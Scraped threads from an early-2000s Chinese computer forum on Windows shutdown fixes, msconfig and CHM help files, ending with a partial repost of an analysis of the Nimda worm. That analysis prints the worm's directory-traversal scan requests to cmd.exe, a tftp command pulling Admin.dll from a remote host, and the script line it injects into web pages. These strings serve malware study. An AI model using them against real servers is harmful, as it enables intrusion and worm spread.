ImHow 怎样 积分：2446 发帖：648 来自：::HowHome:: 注册：2002-01-16 | 发表于 2002-06-29 23:32:12 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP 假设你的系统盘为C，新的browselc.dll就在根目录下，那么在DOS下输入： c:>"copy browselc.dll WINNT\system32"(引号中的是你要输入的内容) 如果你是98，就把WINNT\system32改为windows\system ::古落根门:: 唯有不断学习 才能不断进步
魑魅魍魉 终级用户 积分：539 发帖：209 来自：[狴犴] 注册：2002-02-26 | 发表于 2002-06-30 01:40:57 按此观看魑魅魍魉的个人资料 按此发邮件给魑魅魍魉 发送悄悄话给魑魅魍魉 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看魑魅魍魉的IP 谢谢~会了！ ├○─○┤ pu!w hw n! shemle aq ll!m noh pue hldaap os noh ss!w I hqeq
上一贴 | 下一贴
快速回复 主题：IE6的 "co.cn" 有没有直接改注册表的方法？
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


不能完全关机在CMOS里怎么改 - 经 典 论 坛

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙

计算机技术
不能完全关机在CMOS里怎么改

上一贴 | 下一贴
发表人 主题: 不能完全关机在CMOS里怎么改
wangfeng

超级用户
积分：330
发帖：102
来自：辽宁
注册：2001-12-23
 发表于 2002-01-18 21:53:40 按此观看wangfeng的个人资料 按此发邮件给wangfeng 访问wangfeng的主页 wangfeng 的 oicq 是56202481,查看 56202481 的资料 收藏该主题供以后查看 发送悄悄话给wangfeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看wangfeng的IP
2000SERVER还没正常关过呢 98有时候也犯病 应该是CMOS 中电源管理的问题

请高手帮忙哦

我曾经问个不休？………………………………………………？
肖天

超级用户
积分：354
发帖：92
来自：黑龙江省
注册：2001-06-28
 发表于 2002-01-19 03:58:20 按此观看肖天的个人资料 按此发邮件给肖天 访问肖天的主页 肖天 的 oicq 是44351669,查看 44351669 的资料 发送悄悄话给肖天 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看肖天的IP
别的我不知道，
98下有一个快速关机的补丁
我用的非常好用

good good study ,day day up!
啸

无意
现任版主
积分：6219
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-01-19 17:40:57 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
不单是CMOS，可能的原因很多，我以前的机子就是靠改注册表搞定的。
网上关于这方面的文章很多，推荐几篇，希望能对你有所帮助：

WIN98无法关机的解决方法
http://www.people.com.cn/GB/channel5/569/20000706/133257.html

为什么Win98升级到Win2000后无法自动关机
http://dichen.myrice.com/WIN2000gj.htm

解决Windows 9x不能正常关机
http://pcworld.ccw.com.cn/2001/back_issues/2104/0433e.asp

Win98 Se关机补丁
http://go4.163.com/feng45/software/patch.html

WIN98无法关机的解决方法

eNet学院
      有时我们关闭Windows98 ，系统却没有响应，对于这个问题，笔者遇到较多，因此进行了多时的摸索，对于引起这个问题的一些原因已摸清，并总结了一些经验。

    通常造成这种现象的原因有多种，可从以下几个方面入手解决：

    一、检查是否由“退出Windows”声音文件导致。

    在“控制面板”中双击“声音”。在“事件”框中，将“退出Windows”事件的声音设置为“无”。如果Windows98能够正常关闭，则说明该问题是由退出声音文件所引起的，要解决这一问题，可以重新安装提供声音文件的程序。

    二、检查快速关机与某些硬件是否兼容。

    快速关机是Windows98中的新增功能，可以大大减少关机时间。但是，该功能与某些硬件不兼容，可能会导致电脑停止响应。在“运行”对话框中的“打开”框中键入“Msconfig”启动“系统配置实用程序”，单击“高级”按钮，选中“禁用快速关机”选项。如果电脑正常关机，则快速关机功能可能与电脑上所安装的某个设备不兼容。

    三、确认问题是否由“高级电源管理”功能引起

    在“系统”属性框中单击“设备管理器”选项卡，在“系统设备”中双击列表中的“高级电源管理”，单击“设置”选项卡，然后取消“启用电源管理”选项。如果电脑正常关机，则问题的原因可能在于APM(高级电源管理)。

    四、在Bootlog.txt文件中判断问题的原因

    使用文本编辑器(如记事本)检查Bootlog.txt文件中的“Terminate=”条目。这些条目位于文件的结尾，可为问题的起因提供一定的线索。

    对于每一个Terminate=条目，查找所匹配的EndTerminate=条目。

    如果Bootlog.txt文件的最后一行为EndTerminate=KERNEL，Windows98可成功关闭。

    如果Bootlog.txt文件的最后一行为下列某项条目，请检查所列出的可能原因：

    Terminate=Query Drivers内存管理程序有问题。

    Terminate=Unload Network与Config.sys中的实模式网络驱动程序冲突。

    Terminate=RIT声卡或旧的鼠标驱动程序存在与计时器有关的问题。

    Terminate=WIN32 32位程序锁定了线程。

    五、判断在Config.sys文件或Autoexec.bat文件中是否存在冲突

    以安全模式启动电脑，在“运行”对话框的“打开”框中，键入“Msconfig”启动“系统配置实用程序”，单击“诊断启动”。系统提示重新启动电脑时，请单击“确定”。如果电脑的启动关闭不正确，需要确定问题是由Config.sys或Autoexec.bat文件的哪一行引起的。逐个取消Config.sys和Autoexec.bat选项卡中不含Windows图标的行的复选标记，然后尝试关闭电脑。

    六、判断在System.ini文件或Win.ini文件中是否存在冲突

    在“运行”对话框中键入“Msconfig”启动“系统配置实用程序”，在“常规”选项卡中，单击以取消“启动选项”中的所有选项。选中“处理System.ini文件”选项。选中“处理Win.ini文件”选项。如果电脑仍然无法正常关闭，则说明System.ini或Win.ini中的条目存在问题。请仔细检查每一个条目，以便确定导致问题的原因。确定引发问题的条目之后，可以删除此条目或在此条目前加分号(；)以禁用此条目或者修改此条目以便不再引起问题。
《互联网周刊》eNet 2000年07月06日

WIN2000下无法关机问题的解决

为什么Win98升级到Win2000后无法自动关机

从Win98升级到Win2000后有的机器不能象在Win98下那样自动切断电源，而是
到最后的“您可以安全地关闭计算机了”这个提示画面，就停住不动了，因此还需
要手动关闭电源。原因在于一些BX芯片组主板对于ACPI电源管理标准的兼容性的确
不是很好，而Windows 2000却又默认使用ACPI电源管理标准，并且要求主板符合全
部的ACPI电源管理标准的要求，因此造成了不少BX主板无法在Windows 2000下实现
自动关闭电源的功能。
你可以试试如下方法：
（1）正常启动操作系统后，用鼠标左键单击“开始”——“设置”——“控制
面板”，选择其中的“电源管理”——“高级电源管理”，选中“启用高级电源管
理”选项，即将ACPI电源管理方式改选为APM电源管理方式，因为APM是一个老的电
源管理标准，所有的BX主板都可以很好的支持它。强制Windows 2000使用APM电源管
理标准后一般可以让Windows 2000自动关闭计算机。
（2）刷新主板BIOS到最新版。

解决Windows 9x不能正常关机
田勇
---- Windows 9x的软关机给大家带来了许多方便，但时常会出现不能正常关机的现象。为此，笔者为大家献上几策，看能否帮上您的忙。

---- 其实，一旦关机由软件过程取代，这个软件就不可避免地受到电脑上其他各种软件的干扰。因此，导致系统不能正常软关机的原因有无穷多个，不过系统的快速关机、系统文件毁坏或找不到系统文件、电源管理程序不兼容、显示卡驱动程序异常以及Windows 98 SE与SiS芯片组不兼容则是更常见的原因。

---- 当您的Windows 9x系统不能正常关机时，可以按照下面的顺序分析解决。

1．查看禁止快速关机

---- 系统选项"禁止快速关机"是通常导致系统不能正常关机的最常见的原因。系统进行快速关机时很容易导致异常，因此先要设置这个选项。选择"开始"*"程序"*"附件"*"系统工具"*"系统信息"，打开"Microsoft系统信息"对话框，选择"工具"*"系统配置实用程序"，在"常规"选项卡单击"高级"按钮，然后选中"禁止快速关机"复选框。

2．查看Windows 98 SE与SiS芯片组的兼容性

---- Windows 98 SE版本虽然较其前身Windows 98 更稳定，但在关机的设计上似乎还不尽如人意。其中与SiS芯片组冲突的典型例子就是在出现关机画面时死机。解决的方法是到相应的主板网站上寻找补丁程序。比如，流行的麒麟主板网站（http://www.pcchip.com.tw）上有关于SiS 530芯片组和SiS 620芯片组的补丁程序。

3．系统优化程序引起的问题

---- Windows优化是件很难的事情，为了速度就有可能降低系统的可靠性，而Windows 9x系统的可靠性并不是很高，因此，对于很多喜欢使用系统的快速关机功能的系统优化软件在执行时常常会出现问题。因此，如果在使用系统优化软件后就会出现问题，应该赶快检查"禁止快速关机"选项。

4．软件非正常结束引起的问题

---- 一些软件在结束时，可能会因为所做的某些操作对系统数据或文件产生影响而导致系统无法正常关机。这种情况区别于软件的设计不良，这可能是系统自身对自己的保护不利，有时也与多任务有关。虽然Windows 9x具有多任务的特性，但一些大的软件在多任务同时执行时很容易引起故障，如非法操作、蓝屏故障和死机等。这种情况造成的无法关机的问题通常在下次开机时就不出现了。

---- 在您使用IE 5或更高版本上网时要注意，它们在退出后仍然占用大量的系统资源，通常使系统的可用资源不足80%，在这之后运行其他软件就很容易出错，很可能导致系统无法软关机。

5．程序设计不良引起的问题

---- 一些程序的BUG或一些16位软件也有可能破坏内存中的系统数据或文件。驻留内存的软件也容易引起冲突，从而导致系统关机异常。找出具有这样问题的软件也不是很容易，选择"开始"*"程序"*"附件"*"系统工具"*"系统信息"，打开"Microsoft系统信息"对话框，选择"工具"*"系统配置实用程序"，可以设置允许或禁止"启动"中的多个驻留Windows 9x的程序。其他有问题的应用软件就只能在长时间的使用过程中去寻找它们的弊端，以便及时避免错误发生。

---- 若使用某种扫描仪应用软件Text Bridge Classic 2.0，再上网就无法正常关机。您或者卸载该软件，或者在使用该软件时不上网都可以正常关机。

6．系统文件损坏或找不到

---- 系统文件的作用自然比其他应用软件对关机的影响更大，比如vmm32.vxd文件的损坏，在Windows 98中可以在"Microsoft系统信息"中选择"工具"*"系统文件检查器"来检查、恢复。使用Windows 95的用户可以直接从其他安装Windows 95的电脑上拷贝该文件或使用应用软件中更新的文件。

7．电源管理不兼容

---- 一些电脑与高级电源管理程序（Advanced Power Management，APM）不兼容，实际是由APM与主板的BIOS不兼容造成的。在"我的电脑"上单击鼠标右键，选择"属性"，在"设备管理器"选项卡中选择"系统设备"*"高级电源管理"*"设备的用法"，选中"在此硬件配置文件中禁用"复选框。也可以在BIOS中禁止类似"Power Control By APM"的选项。

---- 在不连接Modem的前提下，把BIOS电源管理设置中的"PWR Up On Modem Act"设置成Enabled，也可能造成无法关机。具体现象是在关机后机器又会启动。其原因是电源关机时的波动被误当作Modem的信号唤醒了ATX电源。只要把该选项设置成Disabled即可。这种现象在流行的华硕P2B主板上曾发生过。

8．显示卡驱动程序故障

---- 有的电脑在关机时多显示了一行"C>"，其颜色与字号都与"您现在可以正常关机了"一致，是比较大的橘黄色粗体，此时您可以输入任何命令。这时，您可以尝试重新启动系统并重新安装显示卡驱动程序，这有可能解决该故障。

---- 当然，一些朋友在无法正常关机时，常常会想到去Microsoft网站去下载Windows 98 SE关机补丁。但到目前为止，还没有什么软件下载网站提供这个补丁。

---- 发生无法关机的问题时，请大家注意，最简单最直接的方法就是先回忆在发生这种非正常现象之前对电脑系统做过什么修改？比如增加了什么软件（导致了冲突）、添加了什么硬件（导致冲突）、修改了系统的设置或主板BIOS的设置（导致冲突）或是使用了软盘（引入病毒）等等。此时，应尽力恢复到原来的系统设置或是查杀病毒。如果问题不能解决，则高级格式化重新安装系统的方法是最快的。当然，您也可以使用Ghost将硬盘影像立即恢复，但一定要注意事先备份好重要文件，因为它可能导致硬盘主引导区错误，将整个硬盘上的逻辑分区全部破坏掉，而不是像上面提到的高级格式化C盘后的系统重新安装那样，只影响C盘和其他逻辑分区中的应用软件。

---- (作者地址: 北京2861信箱5分箱，100085 E-mail: dnzs@sohu.com)

[这消息被啸编辑过(编辑时间2002-06-30 05:53:12)]

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：不能完全关机在CMOS里怎么改
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:


msconfig、sysconfig等命令 - 经 典 论 坛

计算机技术
msconfig、sysconfig等命令

上一贴 | 下一贴
发表人 主题: msconfig、sysconfig等命令
bjSun

初级用户
积分：78
发帖：34
来自：中国北京
注册：2001-09-14
 发表于 2001-12-14 11:59:57 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
Windows 2000 Professional，在开始-->运行，输入msconfig、sysconfig等命令，怎么不能执行了？怎么解决？

Sun
张无忌

win1st
管理员
积分：7152
发帖：3115
来自：Blueidea.com
注册：2000-09-10
 发表于 2001-12-14 13:44:17 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
去win98下面copy过来用

态度决定一切

Blueidea Web Team
Team Member

blueonline

Blueonline
积分：829
发帖：1744
来自：blue-online.
注册：2000-12-09
 发表于 2001-12-14 14:45:11 按此观看blueonline的个人资料 按此发邮件给blueonline 访问blueonline的主页 blueonline 的 oicq 是2048486,查看 2048486 的资料 发送悄悄话给blueonline 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看blueonline的IP
http://www.blue-online.net/register/reg_soft.htm

流自己的汗，吃自己的饭，靠天、靠地不如自己干。

:::::::bLUE-oNlINE.nET || vERSION 2001 ───────

BIGBUG

终级用户
积分：1278
发帖：803
来自：不一定
注册：2001-03-21
 发表于 2001-12-14 17:34:19 按此观看BIGBUG的个人资料 按此发邮件给BIGBUG BIGBUG 的 oicq 是9718783,查看 9718783 的资料 发送悄悄话给BIGBUG 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看BIGBUG的IP
2000下没有，copy 98 的，运行后会报错，不用管它

XP下有MSCONFIG

[这消息被BIGBUG编辑过(编辑时间2001-12-14 17:34:05)]

等我想想再签
bjSun

初级用户
积分：78
发帖：34
来自：中国北京
注册：2001-09-14
 发表于 2001-12-15 09:35:54 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
blueonline在上个帖子中说
引用:
http://www.blue-online.net/register/reg_soft.htm

哪一个啊？

Sun
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-12-15 23:37:43 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
2K有自己的命令，98的老命令在2K里取消了。

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
bjSun

初级用户
积分：78
发帖：34
来自：中国北京
注册：2001-09-14
 发表于 2001-12-17 10:41:30 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
hellslayer在上个帖子中说
引用:
2K有自己的命令，98的老命令在2K里取消了。

请问Windows 2000里是什么命令？

Sun
上一贴 | 下一贴
快速回复 主题：msconfig、sysconfig等命令
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


Word 2000文档如何转换成“帮助”文件 - 经 典 论 坛

计算机技术
Word 2000文档如何转换成“帮助”文件

上一贴 | 下一贴
发表人 主题: Word 2000文档如何转换成“帮助”文件
bjSun

初级用户
积分：78
发帖：34
来自：中国北京
注册：2001-09-14
 发表于 2002-01-08 19:18:47 按此观看bjSun的个人资料 按此发邮件给bjSun bjSun 的 oicq 是437362,查看 437362 的资料 收藏该主题供以后查看 发送悄悄话给bjSun 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看bjSun的IP
Word 2000文档如何转换成“帮助”文件，然后嵌套到我的软件中去？

Sun
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-08 22:34:29 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
CHM格式电子书制作详解
http://tech.163.com/tm/010606/010606_22518.html

2001年06月06日11:30:34 网易报道 梁轩

CHM帮助文件是什么？原来的软件大多数采用扩展名为HLP的帮助文件（WinHelp ），但随着互联网的发展，这种格式的帮助文件已经难以适应软件在线帮助的需要，以及更加人性化更加简单易于查看的需要，因此一种全新的帮助文件系统HTML Help由微软率先在Windows98中使用了。由于它是一个经过压缩的网页集合，不但减小了文件的体积，更利于用户从INTERNET上下载，并且还支持HTML、Ac－tiveX、Java、JScript、Visual Basic Scripting 和多种图像格式(.jpeg、.gif和.png 等)，因此很快受到广大软件作者和软件用户的欢迎。不过，它的用途又何止这些？

    下面，我们就以将小说《围城》制作成一部阅读方便的电子版小说为例，一步步地让您了解CHM帮助文档制作的全过程，通过这样的介绍，相信您一定能随心所欲地做出更多自己想要的电子文档。“公欲善其事，必先利其器”，还是先介绍我们的制作工具吧。能制作CHM文件的工具最常用也是最易用的莫过于Microsoft的HTML Help Workshop了，它完全安装后只有4.6M，包括两组工具集：HTML Help Workshop和HTML Help Image Editor。前者就是我们今天要用到的好东东，后者在网页制作中常用到图形文件的编辑和修改。

    安装完HTML Help Workshop后，您可以在开始菜单|程序|HTML Help Workshop中打开它。要建立CHM帮助文件必须先将我们所有想要让其出现在帮助文件中的内容做成相对独立的网页文件（即HTML文件），这些工作可以在HTML Help Workshop中完成，也可以应用其他网页编辑器（如FontPage或HotDog）来制作。

    比如说我们这里将其作为例子的《围城》，就可以按不同的章节来制作。另外，HTML文件之间应该相互链接，如每一章之间应该保留与上一章和下一章超级链接的接口，将这些相对独立的网页制作完成后，将它们储存到一个新建的文件夹中。

    首先我们先介绍几种将要用到的过渡文件：

    1.hhp文件，这是最常用的一类文件，它实际上是“HTML Help project”的缩写，表示HTML帮助文件项目，它是生成CHM文件最直接用到的一类文件，只需要有一个hhp文件就可以根据它来编译相应的CHM文件。

    2.hhc文件，它是“HTML Help table of contents”的缩写，表示的是HTML帮助文件的目录，通常我们在CHM文件浏览器的左边窗口中看到的目录内容就由它来提供，当然，它并不能直接被编译成CHM文件，而先要集成到某一hhp文件中才能发挥作用。

    3.hhk文件，它是“HTML Help Index Keyword”的缩写，为我们提供了CHM文件的关键字索引查询功能，也是一个易于查看的帮助文件不可缺少的一部分，同hhc文件一样，它也不能直接编译生成相应的CHM文件。

    4.hhj文件，它实际上不属于我们今天要讨论的内容，因为它属于另一个帮助文件系统Win Help，在Win Help系统中，hhj文件的作用相当于HTML Help 中的HHP文件，在这里就不做更详细的介绍了。

    我们现在已经知道要编译一个CHM文件，首先要建立一个hhp文件。先在Workshop的“文件”菜单中选择“新建”一个项目，这时将会出现有名为“新建项目”的窗口，这里会有一名“向导”提示您是否将采用原由的WinHelp项目文件（即.hpj）来制作新的项目，可以将“转换WinHelp项目”选项勾掉，点击“下一步”然后指定将要建立的hhp文件的文件名和完整的路径，再进入“下一步”，此时会有三个复选项，它们分别表示以现存的hhc、hhk、HTML文件来建立HHP文件，由于没有现成的hhc和hhk文件，因此我们可以只选择最后一项（HTML Files），点击“下一步”后可以在随后出现的“新建项目——HTML文件”窗口中将我们已经制作好的所有网页文件按先后顺序添加到文件列表中，点击“下一步”后，就可以看到令人愉快的“完成”按键了，但这并不意味着大功告成，因为这一步仅仅是建立了一个hhp文件，还有不少工作等着我们去完成呢。

    一个hhp文件形成后，将会在Workshop|项目窗口中显示此文件的结构，双击此窗口中的[OPTIONS]选项，就可以修改这一项目的结构了，比如要指定项目的标题，指定CHM文件的默认首页文件以及文字编码类型和字体，在文件窗口中，还可以指定将要生成的CHM文件的文件名以及路径、指定编译时所需的hhc和hhk的路径及名称等等。上面我们已经介绍了hhc、hhk文件的作用，它们并不是必须的，可以根据需要来决定是否要生成包含目录以及关键字查询的帮助文档，一般来说，总页数较少的帮助文件可以省略掉这些内容和功能。对照本例的电子版小说《围城》的页数，我们决定简单至上，这时可以执行“文件”菜单中的“编译”命令，Workshop在确认hhp文件的路径及名称后。很快，一本电子版小说就这样生成了，它虽然只是一个独立的文件，但却可以完全脱离自己的机器、脱离Workshop运行（需要IE4.0以上支持）。

    一个比较简单的CHM帮助文件（没有目录、没有索引）的制作过程就是这样，如果您想制作包括目录和索引的帮助文件，可以先分别制作一个HHC文件和一个HHK文件，然后在上一步中将它们添加到相应的项目中就可以了。HHC的建立和编辑的方法有两种，一种是在“文件”菜单中选择新建一个“目录表”，在随后出现的编辑窗口中对其进行编辑；另一种方法是在形成的hhp文件编辑窗口中点击“目录”窗口选择“创建一个新的目录文件”，并为其命名进行相应的编辑。

    经过上面的介绍，现在您一定可以自己编辑制作帮助文件和电子文档了吧，Workshop的用途其实还有很多，其中另一个不得不说的功能是：它不仅可以编译一个CHM文件，更可以对现有的CHM文档进行反编译，这样我们可以更直接地借鉴和使用一些制作得非常精美的帮助文档的某些精彩部分，有时搞一点“拿来主义”感觉还是不错的。

    好了，不多说了，还是告诉您这个HTML Help Workshop的下载地址吧：下载，感兴趣的朋友还是快点吧！

[这消息被啸编辑过(编辑时间2002-01-23 02:52:35)]
[这消息被啸编辑过(编辑时间2002-06-30 05:59:05)]

我是一个老菜鸟

初级用户
积分：4
发帖：1
来自：少林寺
注册：2002-04-24
 发表于 2002-06-20 20:12:19 按此观看我是一个老菜鸟的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给我是一个老菜鸟 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看我是一个老菜鸟的IP
l
上一贴 | 下一贴
快速回复 主题：Word 2000文档如何转换成“帮助”文件
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


对尼姆达蠕虫的详细分析(转贴) - 经 典 论 坛

计算机技术
对尼姆达蠕虫的详细分析(转贴)

上一贴 | 下一贴
发表人 主题: 对尼姆达蠕虫的详细分析(转贴)
cjj31

方与圆
积分：3191
发帖：1148
来自：乡下
注册：2000-07-05
 发表于 2002-01-18 21:27:41 按此观看cjj31的个人资料 按此发邮件给cjj31 收藏该主题供以后查看 发送悄悄话给cjj31 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cjj31的IP
今天在找些资料，顺便贴些上来，如有类同,请版主把它删除,谢谢!

作者：tombkeeper

2001.9.18晚，我习惯性的打开了tcp/80，用这个简单的批处理程序：
-------------cut here-----------
@echo off
:start
nc -vv -w 5 -l -p 80>>httpd.log
goto start
--------------------------------
通常我用它来监测CodeXXX之类的分布，另外还指望运气好能弄到个把变种。
虽然偶尔会收到几个扫描代理服务器的噪声，但一般都是"rcvd 3818"。
忽然我发现从某个IP来了连续的几个一百字节左右的数据，打开httpd.log
一看原来是是一个http扫描，目的是寻找unicode_hole和CodeRedII建立的
root.exe。我没理它，可是在不到5分钟的时间里我连续收到了几个发自不
同IP的同种扫描，难道这就是CodeBlue？我开了一个真正的honeypot，不管
对方GET什么都回应"200 OK"，结果马上就看到了实质性的东西：
"GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0"
好，满足你的要求。运行"tftp -i xxx.xxx.xxx.xxx GET Admin.dll"，结
果马上就得到了好东西，赶紧反编译一下看看，然后再……@#$……%^&……
总算弄清楚了个大概，先写一个分析报告吧。

---------------------------------------------------------------

名称：Worm.Concept.57344 (Nimda/尼姆达)
名称：Nimda/尼姆达

一些反病毒厂商的命名：
Worm.Concept.57344
W32/Nimda.A@mm
W32/Nimda@mm
I-Worm.Nimda
类型：蠕虫/病毒
受影响的系统：Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000
大小：57344字节

蠕虫文件：
[mmc.exe]
出现在windows文件夹，蠕虫扫描和创建tftpd的进程就是它。注意windows系统文件夹里也有
一个mmc.exe，那不是Nimda。

[riched20.dll]
riched20.dll除了出现在windows系统文件夹里，还可能出现在任何有*.doc文件的文件夹里。
因为它是winword.exe和wordpad.exe运行时都要调用的所以当打开DOC文件时就等于运行了Nimda。

[Admin.dll]
（Admin.dll除了在C:，D:，E:的根目录外还可出现在下面的"TFTP*****"出现的地方）

[load.exe]
出现在windows系统文件夹

[%temp%\readme*.exe]

[TFTP****]
形如TFTP3233。文件位置取决于使用tftp的目录。如果是
"GET /scripts/root.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
那么位置就在"Inetpub\scripts\"。如果是
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i [localIP] GET Admin.dll HTTP/1.0"
那么位置就在"/scripts/..%c1%1c../"也就是根目录。

/*以上都是蠕虫文件的可执行程序，它们之间的区别只有文件名不同*/

[readme.eml]
这个东西是值得一提的，他利用了IE5（或者说OE5）的一个漏洞。我们知道html格式
的邮件中图片和多媒体文件都是自动打开的，而可执行文件不是。但如果把可执行文件
指定为多媒体类型，也会自动下载打开。下面是readme.eml的一段：
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
另外，如果文件夹是“按web页查看”，那么即使只是用鼠标单击选中readme.eml
也会导致蠕虫的执行，如果把扩展名改为mht也是可以的，但改为htm就不行。

[readme.nws]
同readme.eml，只是出现的几率很小。

[*.exe]
可执行文件被感染，所以可能是任何文件名。

传播方式：

（一）通过email
在internet临时文件夹中读取所有"htm"，"html"文件并从中提取email地址，
从信箱读取email并从中提取SMTP服务器，然后发送readme.eml。

（二）通过unicode_hole或CodeRedII建立的root.exe
unicode_hole我就不多说了，CodeRedII会在IIS的几个可执行目录下放置root.exe
也是尽人皆知，Nimda首先在udp/69上启动一个tftp服务器
然后会作以下扫描
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

一旦发现有弱点的系统就使用类似下面的命令
GET /scripts/root.exe?/c+tftp -i xxx.xxx.xxx.xxx GET Admin.dll HTTP/1.0
把文件传到主机上去，然后再
GET /scripts/Admin.dll HTTP/1.0

（三）通过WWW服务
在所有文件名中包含default/index/main/readme并且扩展名为htm/html/asp的文件
所在目录中创建readme.eml，并在文件末加上下面这一行
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
也就是说如果一台web服务器被感染了，那么大部分访问过此服务器的机器都会被感染。

（四）通过局域网
Nimda会搜索本地的共享目录中包含doc文件的目录，一但找到，就会把自身复制到目录中命名为riched20.dll（原理见前）

（五）以病毒的方式
搜索[SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths]寻找在远程主机上的可执行文件，
一旦找到，Nimda就会以病毒的方式感染文件。有一点不同的是，它把原文件作为资源存储在新文件中，
运行新文件时再当作可执行文件来调用。奇怪的是Nimda过滤了winzip32.exe，它不会感染winzip32.exe，
可能是作者发现winzip染毒后不能正常运行吧。

确保运行：

